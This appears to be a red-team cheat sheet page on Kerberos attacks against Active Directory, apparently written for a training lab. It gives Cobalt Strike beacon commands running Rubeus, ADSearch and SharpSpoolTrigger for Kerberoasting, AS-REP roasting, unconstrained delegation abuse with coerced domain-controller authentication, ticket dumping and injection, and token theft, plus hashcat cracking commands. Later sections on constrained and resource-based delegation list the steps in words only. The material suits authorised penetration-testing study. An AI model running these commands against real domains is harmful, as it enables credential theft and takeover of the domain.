search
githubEdit

Kerberos

hashtag
1) Kerberoasting

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

ps> hashcat -a 0 -m 13100 hashes wordlist

hashtag
2) ASREPRoast

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

ps> hashcat -a 0 -m 18200 svc_oracle wordlist

hashtag
3) Unconstrained Delegation (Caches TGT of any user accessing its service)

  1. Identify the computer objects having Unconstrained Delegation enabled

     beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

  2. Dumping the cached TGT ticket (requires system access on affected system)

     beacon> getuid
 beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
 beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
 beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

  3. Execute PrintSpool attack to force DC to authenticate with WEB

     beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

  4. Use Machine TGT (DC) fetched to gain RCE on itself using S4U abuse (/self flag)

     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

  5. Inject the ticket and access the service

     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

 beacon> steal_token 2664
 beacon> ls \\dc-2.dev.cyberbotic.io\c$

hashtag
4) Constrained Delegation (allows to request TGS for any user using its TGT)

  1. Identify the computer objects having Constrained Delegation is enabled

  2. Dump the TGT of User/Computer Account having constrained Delegation enabled (use asktgt if NTLM hash)

  3. Use S4U technique to request TGS for delegated service using machines TGT (Use S4U2Proxy tkt)

  4. OR, Access other alternate Service not stated in Delegation attribute (ldap)

  5. Inject the S4U2Proxy tkt from previous step

  6. Access the services

hashtag
5) Resource-Based Constrained Delegation (Systems having writable msDS-AllowedToActOnBehalfOfOtherIdentity)

  1. Identify the Computer Objects which has AllowedToActOnBehalfOfOtherIdentity attribute defined

  2. OR, Identify the Domain Computer where we can write this atribute with custom value

  3. Next we will assign delegation rights to our computer by modifying the attribute of target system

  4. Verify the updated attribute

  5. Get the TGT of our computer

  6. Use S4U technique to get TGS for target computer using our TGT

  7. Access the services

8 Remove the delegation rights

OR, Create Fake computer Account for RBCD Attack

  1. Check if we have permission to create computer account (default allowed)

  2. Create a fake computer with random password (generate hash using Rubeus)

  3. Use the Hash to get TGT for our fake computer, and rest of the steps remains same

PreviousInitial CompomiseNextLAPS

Last updated